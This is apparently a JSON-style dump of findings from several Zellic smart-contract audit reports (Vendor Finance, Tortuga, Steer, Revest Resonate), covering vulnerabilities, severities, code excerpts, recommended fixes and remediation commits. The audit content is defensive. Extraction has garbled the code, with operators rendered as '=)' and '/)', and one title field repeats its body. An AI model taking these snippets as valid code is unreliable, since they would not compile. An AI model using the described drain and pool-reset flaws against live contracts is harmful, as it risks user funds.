if timestamp will overflow. if (rateData.poolExpiry <) block.timestamp) return 0; /) Expired pool. if (rateData.rateType =) FeeType.LINEAR_DECAY_WITH_AUCTION) { Zellic Vendor Finance return computeDecayWithAuction(rateData, rateData.poolExpiry); }else if(rateData.rateType =) FeeType.FIXED){ return rateData.startRate; } revert InvalidType(); } Looking at the contracts in isolation can be a good way to avoid upgradable mistakes in the future. We recommend that FeesManager implement basic sanity checks on the protocolFee and expiry time before accepting them. These checks can help prevent potential errors from occurring down the line. This issue has been acknowledged by Vendor Finance. Zellic Vendor Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Lack of approved borrower check during rollover to the pri- vate pool", + "labels": [ + "Zellic" + ], + "body": "Target: LendingPool Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The PoolFactory contract allows any caller to create private and public pools. A private pool contains a list of approved borrowers managed by the pool owner. If users lend funds using the borrowOnBehalfOf() function from the private pool, the transactions from the nonapproved users will be rejected. Public pool borrowers can roll over to a private pool using the rollInFrom() function if the pool meets the following conditions: The private pool uses the same lendToken and colToken as the public pool. The private pool has the same owner as the public pool. The expiry time of the new pool is more than the expiry time of the current pool. The rollInFrom() function does not check the new borrowers if a pool is private, so any existing borrowers from public pools can roll over to the private pools. This allows bypassing the prohibition on getting a loan by nonwhitelisted users. We recommend adding a check that msg.sender is an allowed borrower to the rollI nFrom function. function rollInFrom( address _originPool, uint256 _originDebt, uint48 _rate ) external nonReentrant { [...))] if ((settings.borrowers.length > 0) &) (!allowedBorrowers[msg.sender])) revert PrivatePool(); /) @audit add this check Zellic Vendor Finance if (settings.pauseTime <) block.timestamp) revert BorrowingPaused(); if (effectiveBorrowRate > _rate) revert FeeTooHigh(); onlyNotPaused(); if (block.timestamp > settings.expiry) revert PoolExpired(); /) Can not roll into an expired pool LendingPoolUtils.validatePoolForRollover( originSettings, settings, _originPool, factory ); [...))] } Vendor Finance acknowledged this finding and implemented a fix in commit afb48cc6. Zellic Vendor Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.4 The lenderTotalFees can be mistakenly reset", + "labels": [ + "Zellic" + ], + "body": "Target: LendingPool Category: Coding Mistakes Likelihood: Low Severity: Low : Low The withdraw function allows the pool owner to withdraw the lendToken to their ad- dress. If the pool uses a strategy, funds will first be withdrawn from the strategy contract before being transferred to the pool owner. The caller can specify the amount to withdraw by passing the _withdrawAmount pa- rameter. If the _withdrawAmount value is equal to type(uint256).max, then all avail- able tokens in the strategy will be withdrawn, and the actual withdrawn amount will be reflected in the balanceChange value. If the _withdrawAmount value is less than the maximum, then the balanceChange value will equal the _withdrawAmount value passed by the caller. If the owner attempts to withdraw tokens greater than the lenderTotalFees, then the lenderTotalFees will be reset to zero. Otherwise, the lenderTotalFees will be de- creased by the _withdrawAmount value. function withdraw( uint256 _withdrawAmount ) external nonReentrant { GeneralPoolSettings memory settings = poolSettings; onlyOwner(); onlyNotPaused(); if (block.timestamp > settings.expiry) revert PoolExpired(); /) Use collect after expiry of the pool uint256 initLendTokenBalance = settings.lendToken.balanceOf(address(this)); uint256 balanceChange; if (address(strategy) !) address(0)) { strategy.beforeLendTokensSent(_withdrawAmount); /) Taxable tokens should not work with strategy. balanceChange = settings.lendToken.balanceOf(address(this)) - initLendTokenBalance; if (_withdrawAmount !) type(uint256).max &) balanceChange < _withdrawAmount) revert FailedStrategyWithdraw(); Zellic Vendor Finance } else { balanceChange = _withdrawAmount; } lenderTotalFees = _withdrawAmount < lenderTotalFees ? lenderTotalFees - _withdrawAmount : 0; GenericUtils.safeTransfer(settings.lendToken, settings.owner, balanceChange); emit Withdraw(msg.sender, _withdrawAmount); } The lenderTotalFees can be mistakenly reset in certain situations. 1. If the strategy is not zero and the caller passes the withdrawAmount equal to type(uint256).max, then the _withdrawAmount will be greater than the lenderTot alFees, regardless of how many tokens were actually withdrawn. 2. If the strategy is zero and the caller passes the withdrawAmount equal to type(u int256).max, the transaction will not be reverted inside the GenericUtils.safe Transfer function. This is because, in this case, the GenericUtils.safeTransfer function will transfer the current balance, regardless of whether it is less than the lenderTotalFees. function safeTransfer( IERC20 _token, address _account, uint256 _amount ) external{ uint256 bal = _token.balanceOf(address(this)); if (bal < _amount) { _token.safeTransfer(_account, bal); emit BalanceChange(address(_token), _account, false, bal); } else { _token.safeTransfer(_account, _amount); emit BalanceChange(address(_token), _account, false, _amount); } } Zellic Vendor Finance 3. If the strategy is zero and the caller passes a withdrawAmount that is greater than the lendToken balance of contract. This could result in the lenderTotalFees being mistakenly reset, just as described in the second point. If the lenderTotalFees is mistakenly reset, more lend funds will be available to bor- rowers than expected by the owner. When the pool uses a strategy, it is important to compare the lenderTotalFees with the balanceChange value before making any updates. If the balanceChange value is greater than the lenderTotalFees, then the lenderTotalFees should be reset to zero. On the other hand, if the balanceChange value is less than or equal to the lenderTotalFees, then the lenderTotalFees should be decreased by the balanceChange value. If the pool does not use a strategy, then the current lendToken balance of the contract should be obtained and compared with the _withdrawAmount. If the _withdrawAmoun t is more than the current balance, then _withdrawAmount should be updated to the balance value. Only then can the lenderTotalFees be compared and reduced if the _withdrawAmount is less than lenderTotalFees, or reset if it is not. Vendor Finance acknowledged this finding and implemented a fix in commit b85e552f. Zellic Vendor Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Missing test coverage", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple Category: Code Maturity Likelihood: N/A Severity: Low : Informational While the overall test coverage of the project is very good, there are some critical functionalities that have not been fully tested. Specifically, there is a lack of negative test cases, which are essential for ensuring the platform\u2019s resilience to unexpected inputs and edge cases. As such, it is recommended that the development team focus on writing negative test cases for critical functionalities that have not been fully tested. These test cases can be relatively short and quick to write and execute, but they are essential for identifying potential vulnerabilities and ensuring that the platform is able to handle unexpected situations. The threat model section of this report will mention some missing test coverage, but here are some highlights for critical functionality: FeesManager-setPoolRates()->validateParams() PoolFactory->grantOwnership() and claimOwnership() PoolFactory->deployPool(), check that all reverts work as expected Multiple functions that have the onlyOwnerORFirstResponder() modifier are only verified with the owner. Testing with the least amount of privileges is better here. Even minor missing test cases may lead to large mistakes during future code changes. Comprehensive test coverage is essential to minimize the risk of errors and vulnera- bilities. It helps to identify potential issues early, reduce debugging, and increase the reliability of the platform. Prioritizing test coverage for major functionalities and edge cases is crucial for ensuring a robust and reliable platform. Implement missing negative test cases for the most critical business logic (ownership transfer, special privilege functions, pausing and unpausing, etc.). Zellic Vendor Finance Vendor Finance expanded the test suite by writing additional tests for critical func- tionalities in commits 1f81d121, 6b1b59e3 and ff44da5c. Zellic Vendor Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Vendor Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Tortuga coin initialization", + "labels": [ + "Zellic" + ], + "body": "Target: tortuga::initialize_tortuga_liquid_staking Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The initialize_tortuga_liquid_staking function calls coin:)initialize to instanti- ate the Coin resource. However, within the function body of coin:)initialize is an assertion statement that the creator of the resource matches the deploying package\u2019s address. assert!( coin_address() =) account_addr, error:)invalid_argument(ECOIN_INFO_ADDRESS_MISMATCH), ); Users would not be able to access this function and not deploy their own version of StakedAptosCoin. We recommend making this function only accessible for Tortuga\u2019s address. Move Labs fixed this issue in commit ef89a88. Zellic Move Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Protocol configurations", + "labels": [ + "Zellic" + ], + "body": "Target: tortuga::stake_router.move Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium The following setter functions configure the protocol but have no input validation: se t_min_transaction_amount, set_reward_commission, and set_cooldown_period. public entry fun set_reward_commission( tortuga: &signer, value: u64 ) acquires StakingStatus { let staking_status = borrow_global_mut(signer:)address_of(tortuga)); staking_status.reward_commission = value; } public entry fun set_cooldown_period( tortuga: &signer, value: u64 ) acquires StakingStatus { let staking_status = borrow_global_mut(signer:)address_of(tortuga)); staking_status.cooldown_period = value; } public entry fun set_min_transaction_apt_amount( tortuga: &signer, value: u64 ) acquires StakingStatus { let staking_status = borrow_global_mut(signer:)address_of(tortuga)); staking_status.min_transaction_apt_amount = value; } This could pose as a centralization risk and allow impractical configuration values. Zellic Move Labs For example, setting the minimum transaction amount too high could inhibit new users from entering the protocol, and setting the reward commission too high mistakingly would inhibit validators from being able to acquire reasonable amounts of delegations. We recommend adding upper bound checks on these functions to allow for a rea- sonable max threshold. Move Labs fixed this issue in commit ef89a88. Zellic Move Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Payouts round down", + "labels": [ + "Zellic" + ], + "body": "Target: tortuga::delegation_state Category: Coding Mistakes Likelihood: Medium Severity: Low : Low It is possible to perform an economically impractical, griefing-style attack that abuses the rounding down behavior of mul_div in disperse_all_payouts to ensure only those with a relatively high number of shares can receive a payout: let payout_value = math:)mul_div( delegator_shares_for_payout, reserve_balance, reserved_share_supply, ); If the reserve_balance is low enough, delegators with few shares would receive zero payout while delegators with many shares would receive some. Dust is refunded to the reserve at the end of disperse_all_payouts, meaning repeated, quick calls to dis perse_all_payouts would result in only high-value delegators getting payouts. Malicious, high-value delegators (i.e., those with many shares) could cause lower- value delegators to not receive any payouts. A potential solution could be to delay payout until a minimum reserve balance is met. Move Labs fixed this issue in commit ef89a88. Zellic Move Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Centralization risk in minimum delegation amount", + "labels": [ + "Zellic" + ], + "body": "Target: delegation::delegation_service Category: Business Logic Likelihood: Medium Severity: Low : Low The set_min_delegation_amount function allows pool owners to set an arbitrary value for the minimum delegation amount without any constraints. So, a pool owner could set the value to the maximum u64, effectively making it impossible for anyone except the owner or protocol to delegate APT to a managed_stake_pool. public entry fun set_min_delegation_amount(pool_owner: &signer, value: u64) acquires ManagedStakePool { let managed_pool_address = signer:)address_of(pool_owner); let managed_stake_pool = borrow_global_mut(managed_pool_address); managed_stake_pool.min_delegation_amount = value; } A pool owner could set the value to the maximum u64, effectively making it impossible for anyone except the owner or protocol to delegate APT to a managed_stake_pool. Set a hardcoded maximum value for the min_delegation_amount. Move Labs fixed this issue in commit ef89a88. Zellic Move Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Precision loss in reward rate calculation", + "labels": [ + "Zellic" + ], + "body": "Target: oracle::validator_states Category: Coding Mistakes Likelihood: Informational Severity: Informational : Informational When calculating the effective reward rate, the effective_reward_rate function uses an order of operations that is not ideal; we recommend multiplying before dividing in cases where there is little risk of overflow to improve calculation precision. The effective reward rate may be slightly lower than intended. Change the order of the following operations: fun effective_reward_rate( stats_config: &StatsConfig, rewards: u128, balance_at_last_update: u128, time_delta: u128, ): u128 { (rewards * stats_config.rate_normalizer / balance_at_last_update) * stats_config.time_normalizer / time_delta (rewards * stats_config.rate_normalizer*stats_config.time_normalizer)/ (balance_at_last_update * time_delta) } In response to this finding, Move Labs noted that: We have two normalizers just so that we can have double control over preci- sion. rate_normalizer will be as large as possible that still ensures no overflows Zellic Move Labs in the first mul_div. Then time_normalizer could be any other reasonable value for precision. Multiplying the normalizers first, as in the recommendation is the same as using just one normalizer. We are hoping to get additional precision if necessary using two normalizers. Zellic Move Labs 4 Formal Verification The MOVE prover allows for formal specifications to be written on MOVE code, which can provide guarantees on function behavior. During the audit period, we provided Move Labs with Move prover specifications, a form of formal verification. We found the prover to be highly effective at evaluating the entirety of certain functions\u2019 behavior and recommend the Move Labs team to add more specifications to their code base. One of the issues we encountered was that the prover does not support recursive code yet. We suggest replacing the recursive functions, specifically the math:)pow functions to a loop form so additional specs can be written on the project. The following is a sample of the specifications provided. 4.1 tortuga::stake_router Verifies the result is a multiplication-divide: spec calc_shares_to_value { requires t_apt_supply !) 0; aborts_if t_apt_supply < num_shares; ensures result <) MAX_U64; ensures result =) num_shares * total_worth / t_apt_supply; } Verifies the following resources are created upon initialization: spec initialize_tortuga_liquid_staking { ensures exists(signer:)address_of(tortuga)); ensures exists(signer:)address_of(tortuga)); ensures exists(signer:)address_of(tortuga)); ensures exists(signer:)address_of(tortuga)); } Verifies values were mutated: Zellic Move Labs spec set_min_transaction_amount { ensures borrow_global_mut(signer:)address_of(tortuga)).min_transaction_amount =) value; } spec set_cooldown_period { ensures borrow_global_mut(signer:)address_of(tortuga)).cooldown_period =) value; } spec set_reward_commission { ensures borrow_global_mut(signer:)address_of(tortuga)).reward_commission =) value; }", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "4.2 helpers::circular_buffer Verifies the buffer always contains the latest value pushed: spec push { ensures len(old(cbuffer.buffer)) < max_length &) cbuffer.last_index + 1 > len(cbuffer.buffer) ==> contains(cbuffer.buffer, value); } Verifies the empty function returns an empty buffer: spec empty { ensures len(result.buffer) =) 0; ensures result.last_index =) 0; } Verifies the length of cbuffer: spec length { Zellic Move Labs ensures len(cbuffer.buffer) =) result; } Verifies borrow_oldest and round_robin behavior: spec fun helper_round_robin(a: u64, b: u64): u64 { assert!(b > 0 &) a <) b, error:)invalid_argument(EARITHMETIC_ERROR)); if (a < b) { a } else { } } spec round_robin { aborts_if b > 0 |) a <) b; } spec borrow_oldest { /) Verifies behavior about the borrow_oldest function in circular_buffer aborts_if cbuffer.last_index + 1 > len(cbuffer.buffer); aborts_if len(cbuffer.buffer) =) 0; let oldest_index = helper_round_robin(cbuffer.last_index +1, len(cbuffer.buffer)); ensures result =) cbuffer.buffer[oldest_index];", + "labels": [ + "Zellic" + ], + "body": "4.2 helpers::circular_buffer Verifies the buffer always contains the latest value pushed: spec push { ensures len(old(cbuffer.buffer)) < max_length &) cbuffer.last_index + 1 > len(cbuffer.buffer) ==> contains(cbuffer.buffer, value); } Verifies the empty function returns an empty buffer: spec empty { ensures len(result.buffer) =) 0; ensures result.last_index =) 0; } Verifies the length of cbuffer: spec length { Zellic Move Labs ensures len(cbuffer.buffer) =) result; } Verifies borrow_oldest and round_robin behavior: spec fun helper_round_robin(a: u64, b: u64): u64 { assert!(b > 0 &) a <) b, error:)invalid_argument(EARITHMETIC_ERROR)); if (a < b) { a } else { } } spec round_robin { aborts_if b > 0 |) a <) b; } spec borrow_oldest { /) Verifies behavior about the borrow_oldest function in circular_buffer aborts_if cbuffer.last_index + 1 > len(cbuffer.buffer); aborts_if len(cbuffer.buffer) =) 0; let oldest_index = helper_round_robin(cbuffer.last_index +1, len(cbuffer.buffer)); ensures result =) cbuffer.buffer[oldest_index]; }", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "4.3 tortuga::stakedaptoscoin Verifies StakedAptosCoin exists after initialization: spec register_for_t_apt { ensures exists)(signer:)address_of(account)); } Zellic Move Lab", + "labels": [ + "Zellic" + ], + "body": "4.3 tortuga::stakedaptoscoin Verifies StakedAptosCoin exists after initialization: spec register_for_t_apt { ensures exists)(signer:)address_of(account)); } Zellic Move Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Tortuga Liquid Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The _calcSharesAndAmounts rounds amounts used down", + "labels": [ + "Zellic" + ], + "body": "Target: BaseLiquidityManager Category: Coding Mistakes Likelihood: Low Severity: Low : Low The _calcSharesAndAmounts function calculates how much the user should pay and how many shares should be minted for them. In the two branches handling the case of zero tokens of one type, the amount of tokens charged is rounded down when it should be rounded up. function _calcSharesAndAmounts( uint256 amount0Desired, uint256 amount1Desired ) { internal view returns (uint256 shares, uint256 amount0Used, uint256 amount1Used) /) [...))] } else if (total0 =) 0) { shares = FullMath.mulDiv(amount1Desired, _totalSupply, total1); amount1Used = FullMath.mulDiv(shares, total1, _totalSupply); } else if (total1 =) 0) { shares = FullMath.mulDiv(amount0Desired, _totalSupply, total0); amount0Used = FullMath.mulDiv(shares, total0, _totalSupply); } /) [...))] Note that there is equivalent code in SushiBaseLiquidityManager.deposit. The depositing user gains more shares than they should by a rounding error. There is a miniscule chance (if the values all match up) that when the user redeems their Zellic Steer shares, they will gain one more unit of the token than they deposited. Note that the value of one unit of token is insignificant, however, since tokens usually have a large denominator. Round up the amount1Used and amount0Used in the above branches. This issue has been acknowledged by Steer, and a fix was implemented in commit 2986c269. Zellic Steer", + "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The strategyCreator is not verified in createVaultAndStrat egy", + "labels": [ + "Zellic" + ], + "body": "Target: SteerPeriphery Category: Business Logic Likelihood: N/A Severity: Informational : N/A In the createVaultAndStrategy, the strategyCreator parameter is not checked and is passed into strategyRegistry.createStrategy. function createVaultAndStrategy( address strategyCreator, string memory name, string memory execBundle, uint128 maxGasCost, uint128 maxGasPerAction, bytes memory params, string memory beaconName, address vaultManager, string memory payloadIpfs ) external payable returns (uint256 tokenId, address newVault) { tokenId = IStrategyRegistry(strategyRegistry).createStrategy( strategyCreator, name, execBundle, maxGasCost, maxGasPerAction ); /) [...))] } The strategyCreator is not subsequently checked in strategyRegistry.createStrate gy. It is possible to create a strategy using someone else\u2019s address, which is not neces- sarily a major concern. Falsifying the strategy creator will lead to the following: Zellic Steer 1. The true creator of the strategy losing control of the strategy, since the NFT is minted to the false creator; and 2. The true creator being unable to collect fees. The vault is empty until someone deposits into the vault. No funds are at risk from a strategy with a false creator. However, it does have the potential for confusion. Consider enforcing the strategy creator to always be msg.sender. However, this is not strictly necessary. Steer provided the following response: Issue 3.2 relates to the verification of the strategyCreator in the createVaultAnd- Strategy function. Our team\u2019s goal is to provide creators with a flexible approach that allows them to generate a strategy from any address and specify the owner of that strategy, whether it is the same address or a different one. To optimize the user experience, our dapp requires that both the vault and strat- egy are created in a single transaction using periphery\u2019s createVaultAndStrategy. To achieve this, we pass the creator as a parameter instead of using msg.sender. Zellic Steer", + "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Ability to drain SteerPeriphery of tokens", + "labels": [ + "Zellic" + ], + "body": "Target: SteerPeriphery Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A This is the _deposit function of SteerPeriphery: function _deposit( address vaultAddress-, uint256 amount0Desired, uint256 amount1Desired, uint256 amount0Min, uint256 amount1Min, address to ) internal returns (uint256) { IMultiPositionManager vaultInstance = IMultiPositionManager( vaultAddress ); IERC20 token0 = IERC20(vaultInstance.token0()); IERC20 token1 = IERC20(vaultInstance.token1()); if (amount0Desired > 0) token0.safeTransferFrom(msg.sender, address(this), amount0Desired); if (amount1Desired > 0) token1.safeTransferFrom(msg.sender, address(this), amount1Desired); token0.approve(vaultAddress, amount0Desired); token1.approve(vaultAddress, amount1Desired); (uint256 share, uint256 amount0, uint256 amount1) = vaultInstance .deposit( amount0Desired, amount1Desired, amount0Min, amount1Min, to ); Zellic Steer if (amount0Desired > amount0) { token0.approve(vaultAddress, 0); token0.safeTransfer(msg.sender, amount0Desired - amount0); } if (amount1Desired > amount1) { token1.approve(vaultAddress, 0); token1.safeTransfer(msg.sender, amount1Desired - amount1); } return share; } Because the vaultAddress parameter is user input, there are a few vectors an attacker could use to drain the contract of the two tokens \u2014 the simplest being passing a mali- cious vault contract that returns 0 for amount0 and amount1 such that the refund trans- fers double the amount0Desired and amount1Desired sent to the contract. Should the contract hold any tokens between transactions, an attacker could poten- tially drain the contract of tokens. Fortunately, this finding has no impact because SteerPeriphery only transiently holds tokens (only within a single transaction). Prominently document that SteerPeriphery should never hold tokens. This issue has been acknowledged by Steer, and a fix was implemented in commit 0e3ed983. Zellic Steer", + "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" + }, + { + "title": "3.4 No validation on tokenId in createStrategy", + "labels": [ + "Zellic" + ], + "body": "Target: VaultRegistry Category: Business Logic Likelihood: N/A Severity: Informational : N/A In the createVault function, the _tokenId parameter is passed to _addLinkedVaultsEn umeration without validation: function createVault( bytes memory _params, uint256 _tokenId, string memory _beaconName, address _vaultManager, string memory _payloadIpfs ) external whenNotPaused returns (address) { /) [...))] _addLinkedVaultsEnumeration( _tokenId, address(newVault), _payloadIpfs, _beaconName ); } In the _addLinkedVaultsEnumeration function, the _tokenId is stored without validation in the VaultData struct. function _addLinkedVaultsEnumeration( uint256 _tokenId, address _deployedAddress, string memory _payloadIpfs, string memory _beaconName ) internal { /) Get the current count of how many vaults have been created from this strategy uint256 currentCount = linkedVaultCounts[_tokenId]; /) Using _tokenId and count as map keys, add the vault to the list of linked vaults Zellic Steer linkedVaults[_tokenId][currentCount] = _deployedAddress; /) Increment the count of how many vaults have been created from a given strategy linkedVaultCounts[_tokenId] = currentCount + 1; /) Store any vault specific data via the _deployedAddress vaults[_deployedAddress] = VaultData({ state: VaultState.PendingThreshold, tokenId: _tokenId, /) no validation on _tokenId /) [...))] }); } The VaultData struct that contains the _tokenId is used in getAvailableForTransaction to fetch the RegisteredStrategy struct via strategyRegistry.getRegisteredStrategy( vaultInfo.tokenId). Given a vault with a nonexistent tokenId, this would return a null RegisteredStrategy struct, which would then cause a reversion from require(tx.gasprice <) info.maxG asCost, \u201cGas too expensive.\u201d);. Assert that the strategy token ID is registered. This issue has been acknowledged by Steer, and a fix was implemented in commit b483149a. Zellic Steer", + "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Deposits do not check vault type", + "labels": [ + "Zellic" + ], + "body": "Target: SteerPeriphery Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A The deposit function does not check that the vaultAddress parameter is a valid vault. function deposit( address vaultAddress, uint256 amount0Desired, uint256 amount1Desired, uint256 amount0Min, uint256 amount1Min, address to ) external { _deposit( vaultAddress, /) not checked for validity amount0Desired, amount1Desired, amount0Min, amount1Min, to ); } A deposit could be made to an invalid vault type. Use IVaultRegistry(vaultRegistry).beaconTypes(vault) to ensure the vault was reg- istered properly (i.e., has an associated beacon type). Consider also checking the vault state to ensure that it is approved or pending thresh- old. Zellic Steer This issue has been acknowledged by Steer, and a fix was implemented in commit 077d6836. Zellic Steer", + "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Missing twapInterval and maxTickChange validation", + "labels": [ + "Zellic" + ], + "body": "Target: SushiBaseLiquidityManager, BaseLiquidityManager Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A The initialize functions of the Sushi and Uniswap vault base contracts do not in- clude any assertions to ensure that the twapInterval and maxTickChange parameters are within a reasonable range. A user could unintentionally deploy a pool with parameters that leave it vulnerable to oracle manipulation attacks. Assert that the twapInterval and maxTickChange parameters are within reasonable ranges. This issue has been acknowledged by Steer, and a fix was implemented in commit f2881e83 for the SushiBaseLiquidityManager. A fix was implemented in commits ac11ba56 and f7ceb734 for the BaseLiquidityMana ger. Zellic Steer", + "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing validation check in createPool can result in loss of user funds", + "labels": [ + "Zellic" + ], + "body": "Target: Resonate Category: Business Logic Likelihood: Medium Severity: Critical : Critical The function createPool(...))) can be called on an already existing pool when add itionalRate > 0 &) lockupPeriod =) 0. The check for a preexisting pool in initPoo l only addresses the case of (lockupPeriod >) MIN_LOCKUP &) additionalRate =) 0) by using the following check require(pools[poolId].lockupPeriod =) 0, 'ER002'). A malicious user could recreate an already existing pool. This would reset the Pool Queue(...))), which tracks the positions in the queue of the consumer and producer If orders. These orders would effectively be taken out of the matching algorithm. the pool had only processed a limited number of orders, the previous orders could easily be overwritten and no longer modified using modifyExistingOrder(...))). Once overwritten, there would be no way to retrieve the funds from the PoolSmartWallet. Expand the require checks in initPool(...))) to the following: function initPool( address asset, address vault, uint80 rate, uint80 _additional_rate, uint32 lockupPeriod, uint packetSize ) private returns (bytes32 poolId) { poolId = getPoolId(asset, vault, rate, _additional_rate, lockupPeriod, packetSize); Zellic Revest Finance require(pools[poolId].lockupPeriod =) 0 &) pools[poolId]. addInterestRate =) 0, 'ER002'); This finding was remediated by Revest in commit f19896868dd2be5c745c66d9d75219f6 b04a593c. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Failure to cancel orders in modifyExistingOrder", + "labels": [ + "Zellic" + ], + "body": "Target: Resonate Category: Business Logic Likelihood: Medium Severity: Medium : Medium Producers are not able to cancel and recover funds on queued orders using modify ExistingOrder(...))) for cross-asset pools. Calling submitProducer(...))) always sets shouldFarm = false and order.depositedShares > 0 using the oracle price: if(shouldFarm) { IERC20(asset).safeTransferFrom(msg.sender, address(this), amount); order.depositedShares = IERC4626(vaultAdapter).deposit(amount, getAddressForPool(poolId)) / order.packetsRemaining; } else { IERC20(asset).safeTransferFrom(msg.sender, getAddressForPool(poolId), amount); } However, modifyExistingOrder(...))) has missing checks and assumes the orders were deposited in the vault asset instead of the pool asset: if (order.depositedShares > 0) { getWalletForPool(poolId).withdrawFromVault(amountTokens, msg.sender, vaultAdapters[pool.vault]); } else { getWalletForPool(poolId).withdraw(amountTokens, pool.asset, msg. sender); } The attempt to withdraw from the vault asset from the pool wallet will fail. Fortunately, there are no vault assets in the pool wallet to exploit because all vault assets are sent to the FNFT wallet (ResonateSmartWallet) when orders are matched. However, a producer would not be able to retreive the funds of their order. It should be noted that attempting to fix this bug by only directing modifyExistingO rder(...))) to retreive the pool asset instead of the vault asset will result in a critical exploit. This is because submitProducer(...))) accounts for the price of the vault asset while modifyExisitngOrder(...))) does not. Zellic Revest Finance For example, the producer deposits amount of pool assets and gets credited packets equal to amount/ producerPacket: ...)) sharesPerPacket = IOracleDispatch(oracleDispatch[vaultAsset][pool.asset]) .getValueOfAsset(vaultAsset, pool.asset, true); producerPacket = getAmountPaymentAsset(pool.rate * pool.packetSize/ PRECISION, sharesPerPacket, vaultAsset, vaultAsset); ...)) producerOrder = Order(uint112(amount/ producerPacket), sharesPerPacket, msg.sender.fillLast12Bytes()); Through getAmountPaymentAsset(...))) the producerPacket scales linearly with the vault price. However, if the producer tries to later modify their order, there is no adjustment from the number of packets to the amount of pool asset: ...)) if (isProvider) { providerQueue[poolId][position].packetsRemaining -= amount; } else { consumerQueue[poolId][position].packetsRemaining -= amount; } ...)) uint amountTokens = isProvider ? amount * pool.packetSize * pool.rate / PRECISION : amount * pool.packetSize; If vault price > 1 the producer will not be refunded a sufficient amount of assets for the reduction in packets. This is because submitProducer(...))) scales down the packets by the vault price, while modifyExistingOrder(...))) does not commensurately scale up the amount of pool asset per packet. If vault price < 1 the producer will be refunded an excessive amount of assets for the reduction in packets. This is because submitProducer(...))) scales up the packets by the vault price, while modifyExistingOrder(...))) does not commensurately scale down the amount of pool asset per packet. Order cancelling for producers would be nonoperational. Zellic Revest Finance The following changes should be made to modifyExistingOrder(...))): (1) withdrawl the pool asset for cross-asset producer orders and (2) use the price of the vault asset at the time the order was submitted to correctly calculate amountTokens. This finding was remediated by Revest in commit fc3d96d91d7d8c5ef4a65a202cad18a3 e86a3d09. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Failed approval check in calculateAndClaimInterest", + "labels": [ + "Zellic" + ], + "body": "Target: ResonateSmartWallet Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The allowance check for token transfer approval always fails in calculateAndClaimIn terest(...))): ) public override onlyMaster returns (uint interest, uint sharesRedeemed) { IERC4626 vault = IERC4626(vaultAdapter); if(IERC20(vaultToken).allowance(address(this), vaultAdapter) < interest) { IERC20(vaultToken).approve(vaultAdapter, type(uint).max); } The if statement will always fail because interest has not been initialized from zero. Minimal - other functions in ResonateSmartWallet will be called that also set the token transfer approval to max. In the worst case scenario, the very first producer order will be delayed in claiming interest until the first consumer order reclaims their principal. Change interest to totalShares in the if control statement. This finding was remediated by Revest in commit 6b1b81f6c0310297f5b6cd9a258b99e4 3c61b092. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Incorrect asset tracking in modifyExistingOrder", + "labels": [ + "Zellic" + ], + "body": "Target: Resonate Category: Business Logic Likelihood: High Severity: Critical : Critical For cross-asset pools, calling submit submitProducer(...))) always sets shouldFarm = false and order.depositedShares > 0 using the oracle price. Orders are then en- queued with the pool asset: if(shouldFarm) { IERC20(asset).safeTransferFrom(msg.sender, address(this), amount); order.depositedShares = IERC4626(vaultAdapter).deposit(amount, getAddressForPool(poolId)) / order.packetsRemaining; } else { IERC20(asset).safeTransferFrom(msg.sender, getAddressForPool(poolId), amount); } However, modifyExistingOrder(...))) has missing checks and assumes the orders were deposited in the vault asset: if (order.depositedShares > 0) { getWalletForPool(poolId).withdrawFromVault(amountTokens, msg.sender, vaultAdapters[pool.vault]); } else { getWalletForPool(poolId).withdraw(amountTokens, pool.asset, msg. sender); } An attacker could spam submitProducer(...))) and modifyExistingOrder(...))) to con- vert pool assets to vault assets at a rate of 1:1. This could be financially lucrative as there are no ways to shut down the protocol or pull other users funds. It would also disrupt of the balance of the cross-asset pair and hence the potential operation of the pool. Zellic Revest Finance Include logic to enure the vault and pool assets are correctly tracked in cross 